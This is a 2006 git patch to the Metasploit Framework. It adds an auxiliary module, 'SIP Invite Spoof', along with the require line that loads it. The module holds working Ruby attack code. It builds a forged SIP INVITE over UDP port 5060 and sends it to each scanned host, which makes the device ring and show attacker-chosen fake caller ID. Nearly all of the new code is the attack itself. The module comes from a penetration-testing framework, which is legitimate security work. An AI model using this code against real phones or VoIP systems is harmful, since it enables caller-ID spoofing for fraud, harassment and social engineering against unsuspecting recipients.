From b9834c85248a5bff9a2d6e8c9784f6857f80375e Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 31 Oct 2006 23:18:54 +0000
Subject: [PATCH] VoIP module from david maynor

git-svn-id: file:///home/svn/framework3/trunk@4091 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/auxiliary.rb                  |  1 +
 modules/auxiliary/voip/sip_invite_spoof.rb | 53 ++++++++++++++++++++++
 2 files changed, 54 insertions(+)
 create mode 100644 modules/auxiliary/voip/sip_invite_spoof.rb

diff --git a/lib/msf/core/auxiliary.rb b/lib/msf/core/auxiliary.rb
index 4a122e1924..06c50578df 100644
--- a/lib/msf/core/auxiliary.rb
+++ b/lib/msf/core/auxiliary.rb
@@ -19,6 +19,7 @@ class Auxiliary < Msf::Module
 	require 'msf/core/auxiliary/scanner'
 	require 'msf/core/auxiliary/report'
 	require 'msf/core/auxiliary/dos'
+	require 'msf/core/auxiliary/voip'
 	
 	#
 	# Returns MODULE_AUX to indicate that this is an auxiliary module.
diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb
new file mode 100644
index 0000000000..05cae53d42
--- /dev/null
+++ b/modules/auxiliary/voip/sip_invite_spoof.rb
@@ -0,0 +1,53 @@
+require 'msf/core'
+
+module Msf
+
+class Auxiliary::Voip::SipSpoof < Msf::Auxiliary
+        
+	include Exploit::Remote::Udp
+	include Auxiliary::Scanner
+	
+	def initialize
+		super(
+			'Name'           => 'SIP Invite Spoof',
+			'Version'        => '$Revision: 3624 $',
+			'Description'    => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.',
+			'Author'         => 'David Maynor <dave@erratasec.com>',
+			'License'        =>  MSF_LICENSE
+		)
+		
+		deregister_options('Proxies','SSL','RHOST')
+		register_options(
+			[
+				Opt::RPORT(5060),
+				OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']),
+				OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"])
+			], self.class)
+	end
+
+
+	def run_host(ip)
+		
+		begin
+		
+		name=datastore['MSG']
+		src=datastore['SRCADDR']
+		connect_udp
+
+		print_status("Sending Fake SIP Invite to: #{ip}")
+                req  =   "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n"
+                req  <<  "To: <sip:#{ip}>" + "\r\n"
+                req  <<  "Via: SIP/2.0/UDP #{ip}" + "\r\n"
+                req  <<  "From: \"#{name}\"<sip:#{src}>" + "\r\n"
+                req  <<  "Call-ID: #{(rand(100)+100).to_s}#{ip}" + "\r\n"
+                req  <<  "CSeq: 1 INVITE" + "\r\n"
+                req  <<  "Max-Forwards: 20" +  "\r\n"
+                req  <<  "Contact: <sip:127.0.0.1>" + "\r\n\r\n"
+		udp_sock.put(req)
+		disconnect_udp
+	
+		rescue Errno::EACCES
+		end
+	end
+end
+end